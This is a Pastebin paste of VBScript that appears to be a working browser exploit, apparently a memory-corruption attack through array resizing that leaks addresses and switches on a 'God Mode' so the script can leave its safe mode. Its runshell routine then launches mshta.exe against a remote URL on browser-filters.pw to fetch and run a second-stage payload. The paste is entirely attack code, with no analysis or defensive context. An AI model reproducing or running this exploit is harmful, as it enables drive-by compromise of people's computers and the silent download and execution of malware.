Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SetLocale(1033)
- dim arrX(),arrY(),asize,incsize,olapPos,oFSO,oWS,shell,t
- Begin()
- Sub runshell()
- Set oFSO = CreateObject("Scripting.FileSystemObject")
- Set oWS = CreateObject("WScript.Shell")
- Set shell = CreateObject("Shell.Application")
- t=oWS.ExpandEnvironmentStrings("%tmp%")
- if InStr(1,t,"Low")=0 then
- shell.ShellExecute "mshta.exe", "http://pezuvupeb.browser-filters.pw:443/forum/list/5/WYLRFWIK/f4fd8770821b16a5f4df13e89191cefd", "", "", 0
- end if
- End Sub
- function Begin()
- On Error Resume Next
- Init()
- If Exploit() = True Then
- EnableGodMode()
- redim Preserve arrX(asize)
- runshell()
- End If
- end function
- function Init()
- Randomize()
- asize = 13 + 17*rnd(6)
- incsize = 7 + 3*rnd(5)
- end function
- function Exploit()
- Exploit = False
- For i = 0 To 400
- asize = asize + incsize
- If Trigger() = True Then
- Exploit = True
- Exit For
- End If
- Next
- end function
- function Trigger()
- On Error Resume Next
- Trigger = False
- olapPos = asize + 2
- ofnumele = asize + &h8000000
- redim Preserve arrX(asize*2+1)
- redim Preserve arrX(asize)
- redim arrY(asize)
- redim Preserve arrX(ofnumele)
- typev = 1
- arrY(0) = 1.123456789012345678901234567890
- If (IsObject(arrX(olapPos-1)) = False) Then
- If (VarType(arrX(olapPos-1)) <> 0) Then
- If (IsObject(arrX(olapPos)) = False) Then
- typev = VarType(arrX(olapPos))
- End If
- End If
- End If
- arrY(0) = 0.0
- If (typev = &h2f66) And (VarType(arrX(olapPos)) = 0) Then
- Trigger = True
- Else
- redim Preserve arrX(asize)
- End If
- end function
- function ReadMemInt(addr)
- arrY(0) = 0
- arrX(olapPos) = addr+4
- arrY(0) = 8
- ReadMemInt = lenb(arrX(olapPos))
- end function
- function EnableGodMode()
- i = LeakFnAddr()
- i = ReadMemInt(i+8)
- i = ReadMemInt(i+16)
- myarray = Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uFFFF%u7FFF%u0000%u0000")
- arrX(olapPos+2) = myarray
- arrY(2) = 8192 + 12
- EnableGodMode = False
- For k=0 To &h60 step 4
- j = ReadMemInt(i+&h120+k)
- If (j = 14) Then
- arrX(olapPos+2)(i+&h11c+k) = arrY(4)
- EnableGodMode = True
- Exit For
- End If
- Next
- end function
- sub dummyfn()
- end sub
- function LeakFnAddr()
- On Error Resume Next
- i = dummyfn
- i = null
- arrY(0) = 0
- arrX(olapPos) = i
- arrY(0) = 3
- LeakFnAddr = arrX(olapPos)
- end function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement